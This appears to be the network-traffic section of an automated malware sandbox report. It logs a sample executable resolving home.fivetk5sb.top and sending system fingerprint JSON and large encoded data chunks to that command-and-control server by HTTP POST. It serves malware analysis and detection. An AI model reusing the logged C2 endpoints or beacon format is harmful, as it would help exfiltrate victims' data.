                                                  Dec 23, 2024 06:55:00.727721930 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727792978 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727874994 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727884054 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727894068 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727931023 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727941036 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728064060 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728104115 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728178024 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728243113 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728254080 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728323936 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728334904 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728415966 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728425026 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728523016 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728538990 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728576899 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728666067 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728764057 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728815079 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728853941 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728889942 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728940964 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728950977 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729001999 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729018927 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729070902 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729139090 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729302883 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729320049 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729371071 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729419947 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729461908 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729552031 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729561090 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729710102 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729720116 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729727983 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729737043 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729747057 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729825020 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729834080 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729841948 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729852915 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729903936 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739208937 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739284992 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739372015 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739382029 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739527941 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739537954 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739546061 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739557981 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739567995 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739578009 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739639044 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739653111 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739661932 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739670992 CET8049716185.121.15.192192.168.2.10
Dec 23, 2024 06:55:00.739758968 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.739769936 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.739833117 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.739842892 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.739979029 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.739988089 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740061998 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740080118 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740180969 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740240097 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740326881 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740381002 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740467072 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740480900 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740518093 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740571976 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740664959 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740675926 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740765095 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740776062 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740916014 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.740947962 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.741065025 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.741075039 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.741144896 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.741154909 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:00.741261005 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:01.577084064 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:01.577217102 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:01.577275038 CET | 49716 | 80 | 192.168.2.10 | 185.121.15.192
Dec 23, 2024 06:55:01.577617884 CET | 49716 | 80 | 192.168.2.10 | 185.121.15.192
Dec 23, 2024 06:55:01.697012901 CET | 80 | 49716 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:02.806998014 CET | 49726 | 80 | 192.168.2.10 | 185.121.15.192
Dec 23, 2024 06:55:02.926516056 CET | 80 | 49726 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:02.926619053 CET | 49726 | 80 | 192.168.2.10 | 185.121.15.192
Dec 23, 2024 06:55:02.927181959 CET | 49726 | 80 | 192.168.2.10 | 185.121.15.192
Dec 23, 2024 06:55:03.046679974 CET | 80 | 49726 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:04.951663017 CET | 80 | 49726 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:04.951848984 CET | 80 | 49726 | 185.121.15.192 | 192.168.2.10
Dec 23, 2024 06:55:04.951909065 CET | 49726 | 80 | 192.168.2.10 | 185.121.15.192
Dec 23, 2024 06:55:04.952353954 CET | 49726 | 80 | 192.168.2.10 | 185.121.15.192
Dec 23, 2024 06:55:05.071751118 CET | 80 | 49726 | 185.121.15.192 | 192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 06:54:55.002644062 CET | 50106 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 06:54:55.002762079 CET | 50106 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 06:54:55.140141010 CET | 53 | 50106 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 06:54:55.140896082 CET | 53 | 50106 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 06:54:58.396060944 CET | 50109 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 06:54:58.396116018 CET | 50109 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 06:54:59.140737057 CET | 53 | 50109 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 06:54:59.141196966 CET | 53 | 50109 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 06:55:02.656680107 CET | 50111 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 06:55:02.656740904 CET | 50111 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 06:55:02.805653095 CET | 53 | 50111 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 06:55:02.806159019 CET | 53 | 50111 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 06:54:55.002644062 CET | 192.168.2.10 | 1.1.1.1 | 0x6228 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:55.002762079 CET | 192.168.2.10 | 1.1.1.1 | 0xba | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 23, 2024 06:54:58.396060944 CET | 192.168.2.10 | 1.1.1.1 | 0x52b9 | Standard query (0) | home.fivetk5sb.top | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:58.396116018 CET | 192.168.2.10 | 1.1.1.1 | 0xf0cf | Standard query (0) | home.fivetk5sb.top | 28 | IN (0x0001) | false
Dec 23, 2024 06:55:02.656680107 CET | 192.168.2.10 | 1.1.1.1 | 0xa3a3 | Standard query (0) | home.fivetk5sb.top | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:55:02.656740904 CET | 192.168.2.10 | 1.1.1.1 | 0x7b55 | Standard query (0) | home.fivetk5sb.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 06:54:55.140141010 CET | 1.1.1.1 | 192.168.2.10 | 0x6228 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:55.140141010 CET | 1.1.1.1 | 192.168.2.10 | 0x6228 | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:54:59.141196966 CET | 1.1.1.1 | 192.168.2.10 | 0x52b9 | No error (0) | home.fivetk5sb.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:55:02.805653095 CET | 1.1.1.1 | 192.168.2.10 | 0xa3a3 | No error (0) | home.fivetk5sb.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
• httpbin.org
• home.fivetk5sb.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49716 | 185.121.15.192 | 80 | 7820 | C:\Users\user\Desktop\Yda6AxtlVP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 06:54:59.263566971 CET | 12360 | OUT | POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1
Host: home.fivetk5sb.top
Accept: */*
Content-Type: application/json
Content-Length: 442597
Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 36 37 33 32 33 33 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163626732336", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
Dec 23, 2024 06:54:59.383268118 CET | 2472 | OUT | Data Raw: 58 5c 2f 65 5a 52 73 63 4e 58 36 6a 68 4d 5a 68 4d 66 51 70 34 72 41 34 72 44 34 7a 44 56 56 65 6c 69 63 4a 57 70 34 69 68 55 57 31 36 64 61 6a 4b 64 4f 61 76 70 65 4d 6d 66 6b 32 4e 77 4f 4f 79 33 45 31 4d 48 6d 4f 44 78 57 41 78 6c 46 70 56 73
Data Ascii: X\/eZRscNX6jhMZhMfQp4rA4rD4zDVVelicJWp4ihUW16dajKdOavpeMmfk2NwOOy3E1MHmODxWAxlFpVsLjcPWwuJpNq6VShXhTqwbTulKKdtRr\/AHT+H8xUNWtrMM8\/U\/8A1zUb\/dP4fzFdBykNFS7T\/eP+fxp9AEWw+3+fwo2H2\/z+FfrHpv8AwSl+Ieqafo2pWvxBtbm11vTNM1O2msvBt9dwRJqdpFdRQ3Eq66gt
Dec 23, 2024 06:54:59.383292913 CET | 2472 | OUT | Data Raw: 43 65 39 51 70 30 5c 2f 37 5a 44 2b 62 56 61 66 72 2b 48 39 54 55 62 66 36 76 5a 73 5c 2f 44 6e 5c 2f 41 44 78 2b 76 38 67 36 43 48 4a 39 5c 2f 77 44 76 7a 5c 2f 38 41 58 71 47 54 5c 2f 62 5c 2f 65 44 6e 41 71 7a 74 5c 2f 6a 5c 2f 48 70 2b 4f 4d
Data Ascii: Ce9Qp0\/7ZD+bVafr+H9TUbf6vZs\/Dn\/ADx+v8g6CHJ9\/wDvz\/8AXqGT\/b\/eDnAqzt\/j\/Hp+OM0zy+nz7P8AJ7DFBX\/Ln\/t0qSN5m\/5w\/wC9\/wCWQNR7nZdmf8\/X\/P50\/wDv\/J8mevm+vf8An\/Omf3H2Z\/e+b36f4f4UHXDb5\/oiHy9u\/wCR9vm\/8tB+H160z5\/lf\/XOf9b\/AJ\/z2qXnO\/8A
Dec 23, 2024 06:54:59.383354902 CET | 2472 | OUT | Data Raw: 50 49 2b 6e 72 69 6e 74 47 37 37 45 66 37 5c 2f 6d 5c 2f 75 72 6e 5c 2f 55 66 35 39 38 5c 2f 77 44 31 36 69 62 37 7a 6f 37 5c 2f 41 50 62 54 38 4b 41 49 46 6a 50 38 42 4f 38 52 6b 2b 5a 4a 5c 2f 77 43 32 6c 70 5c 2f 54 38 73 63 30 63 66 38 41 54
Data Ascii: PI+nrintG77Ef7\/m\/urn\/Uf598\/wD16ib7zo7\/APbT8KAIFjP8BO8Rk+ZJ\/wC2lp\/T8sc0cf8ATP8A6a\/88P8Ar6u\/w6fzxU0ccjNt\/ds8fpnoKhj+aT+\/5faT15\/p71n7Pz\/D\/gmlPr8v1GfPHGkaPGP3tz+8\/wCe34+vr9MUZ\/jR5IXl\/e+Z\/qIBn+ffintJ8zJ9+OP91\/quO\/8ApWfSnyRuuzYn8
Dec 23, 2024 06:54:59.383415937 CET | 2472 | OUT | Data Raw: 33 6a 2b 78 4a 5c 2f 77 57 6b 5c 2f 34 59 34 2b 46 50 69 44 34 59 5c 2f 38 4d 32 66 38 4c 47 5c 2f 74 33 34 68 61 72 34 37 5c 2f 41 4c 62 5c 2f 41 4f 46 78 66 38 49 68 39 6c 5c 2f 74 50 77 35 34 54 38 50 5c 2f 41 4e 6c 66 32 62 5c 2f 77 71 76 78
Data Ascii: 3j+xJ\/wWk\/4Y4+FPiD4Y\/8M2f8LG\/t34har47\/ALb\/AOFxf8Ih9l\/tPw54T8P\/ANlf2b\/wqvxR5\/kf8Iv9r+3fb4fN+3fZ\/scf2bzrj83PjooHhLTiM\/8AIx2n\/ps1evt7\/gk\/pXwP\/aEvfjH+wr8Yfhn4DvvEf7QPgvxLqXwM+Nlx4D8Pap8Rvhf8TfC\/hu51h4LHxk+lv4p0\/wAM3el6GuvGwttZt9M
Dec 23, 2024 06:54:59.383567095 CET | 2472 | OUT | Data Raw: 34 2b 5c 2f 31 36 64 42 5c 2f 6e 32 35 70 64 33 5c 2f 4c 50 74 5c 2f 38 41 57 2b 6c 57 66 4c 35 33 5c 2f 77 44 5c 2f 36 2b 76 58 36 5a 37 65 76 74 56 57 53 50 35 66 39 5a 39 65 63 5c 2f 77 43 66 38 69 67 30 70 39 66 6c 2b 6f 65 5a 5c 2f 77 44 62 65 33
Data Ascii: 4+\/16dB\/n25pd3\/LPt\/8AW+lWfL53\/wD6+vX6Z7evtVWSP5f9Z9ec\/wCf8ig0p9fl+oeZ\/wDbe3U\/j\/Lp+NQyN5nXP+s\/z6+9DdF\/65f0FM+dvb9P\/r0Ggsm7O7Zs\/wC2WP8APrVXD43fxfTvjr69fbPepZO3+s7\/ANKbIr8p15\/1n+f06\/zoOvnfl\/XzK\/Od+z\/tnj9x\/wDq\/wA5zUHyfP8A6zv9P
Dec 23, 2024 06:54:59.383580923 CET | 2472 | OUT | Data Raw: 2b 66 6a 72 36 5c 2f 6a 5c 2f 2b 75 6a 32 76 6e 4c 2b 76 6d 41 7a 61 6b 63 6d 39 50 6e 48 2b 74 6c 5c 2f 36 62 66 70 5c 2f 58 48 66 72 53 37 76 33 62 68 50 4d 33 78 78 66 77 52 66 58 5c 2f 50 38 41 58 6d 6e 52 5c 2f 77 42 7a 66 47 6e 6d 52 66 36
Data Ascii: +fjr6\/j\/+uj2vnL+vmAzakcm9PnH+tl\/6bfp\/XHfrS7v3bhPM3xxfwRfX\/P8AXmnR\/wBzfGnmRf6z\/lhD3\/z\/ADFM8z95v3yfn3\/n17VR0EMkflbHTKJ\/6Jx9fT6cUPIjfOiRI8f7r\/W\/uJv6fXmn7vmjdF\/5ZXHHlH\/DNM2v8nl\/88vN\/wCeE\/5\/\/X6UAM8vzJEf7\/73\/j4jPr0uvz\/p0pnzwxw
Dec 23, 2024 06:54:59.383605957 CET | 2472 | OUT | Data Raw: 5c 2f 73 7a 57 6e 68 72 56 72 67 53 2b 65 73 2b 70 65 47 5c 2f 68 70 6f 76 68 36 37 6d 6a 6c 41 48 6d 4a 4c 4a 70 65 38 50 38 41 38 74 43 78 6b 5c 2f 69 77 50 61 50 43 66 67 50 53 50 67 74 2b 7a 76 34 4d 2b 46 66 39 74 4a 72 4f 6d 66 43 54 77 33
Data Ascii: \/szWnhrVrgS+es+peG\/hpovh67mjlAHmJLJpe8P8A8tCxk\/iwPaPCfgPSPgt+zv4M+Ff9tJrOmfCTw38LPAY1\/U7eDTjep4Pt\/Bul2erXdu009tY3FwlrbX5jS4lS2mkURzM0YauX\/a\/vrS\/\/AGO\/2ip7O5huoR8JvFSma3kWaIlvDkUw2yoWjcGKWN9yMy4Yc5BA\/ojIMxoy40yPA5ZTrywOJ8V8Pmf16rzxljM
Dec 23, 2024 06:54:59.383634090 CET | 2472 | OUT | Data Raw: 65 74 50 5a 2b 66 34 66 38 41 42 4e 71 64 54 35 5c 2f 72 5c 2f 77 41 48 5c 2f 67 36 42 55 66 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 70 4b 6a 48 5c 2f 4c 54 38 66 36 31 6d 64 48 76 5c 2f 41 4e 33 38 53 47 52 63 66 68 5c 2f 49 5c 2f 77 43 66 35 31 44
Data Ascii: etPZ+f4f8ABNqdT5\/r\/wAH\/g6BUfl+\/wCn\/wBepKjH\/LT8f61mdHv\/AN38SGRcfh\/I\/wCf51DVioX+8fw\/kKDXnfl\/XzK7Ltx3zTasVE\/X8P6mg1GVBJH8vXP4f569KnooOgpSR\/Lxx9e\/+en0\/VlTP90\/h\/MVDQdBDyx\/zxTP40+pqWTt+P8ASo6Dsp9fkQ\/M3qf5f4ZqNo09wnT\/ADn\/AD0q1Ucn
Dec 23, 2024 06:54:59.383688927 CET | 2472 | OUT | Data Raw: 41 56 66 36 37 5c 2f 50 36 35 39 2b 51 36 42 6b 6d 5c 2f 35 4e 6a 78 76 2b 39 5c 2f 35 36 5c 2f 6c 2b 48 54 70 54 50 75 73 6e 38 66 2b 78 4a 2b 58 61 6e 74 73 65 4f 62 66 35 69 65 5a 5c 2f 77 42 73 4d 66 35 5c 2f 2b 76 6b 55 2b 50 38 41 65 65 71
Data Ascii: AVf67\/P659+Q6Bkm\/5Njxv+9\/56\/l+HTpTPusn8f+xJ+XantseObf5ieZ\/wBsMf5\/+vkU+P8AeeqP\/wAso5Isf5\/H3oApyf3k+vlfmcfy6fl3qTzEEn+p8maf97n\/AF3HX\/RMZ\/zx6U7dtkTZNG6fn\/jn+mKhWQx+czpJ+8\/59\/8An3Hf\/wDV2rT2nl+P\/AAbJjy9++R383\/VyS\/uOnP\/ANcev6ofL8z
Dec 23, 2024 06:54:59.383763075 CET | 2472 | OUT | Data Raw: 69 4b 37 30 50 78 44 62 32 66 69 6e 77 44 42 34 38 30 52 72 7a 77 37 71 31 67 4c 73 36 67 4c 43 31 76 5c 2f 4b 66 43 2b 73 61 58 34 73 6c 2b 46 43 61 66 34 69 38 46 5c 2f 59 66 6a 44 38 4c 74 59 2b 4d 76 68 72 78 46 4c 72 47 75 78 2b 46 39 4d 2b
Data Ascii: iK70PxDb2finwDB480Rrzw7q1gLs6gLC1v\/KfC+saX4sl+FCaf4i8F\/YfjD8LtY+MvhrxFLrGux+F9M+HvhPUPiPYeP9f8SanP4SgvbS3+HX\/CpvHt34wfSNK1yK0stBuJtMl1YvCkn5Xg\/G\/wjx8HUwvHuR1IRo1cRJzqV6HLQo5VPPZ1ZKvRpNQlktOWb0W0vrGWuGNw\/tcPVpVJ\/tGM+jn445fFzxXhpxLCCr5fhn
Dec 23, 2024 06:55:01.577084064 CET | 309 | IN | HTTP/1.1 502 Bad Gateway
Server: nginx/1.22.1
Date: Mon, 23 Dec 2024 05:55:01 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49726 | 185.121.15.192 | 80 | 7820 | C:\Users\user\Desktop\Yda6AxtlVP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 06:55:02.927181959 CET | 350 | OUT | POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1
Host: home.fivetk5sb.top
Accept: */*
Content-Type: application/json
Content-Length: 209
Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Dec 23, 2024 06:55:04.951663017 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
Server: nginx/1.22.1
Date: Mon, 23 Dec 2024 05:55:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
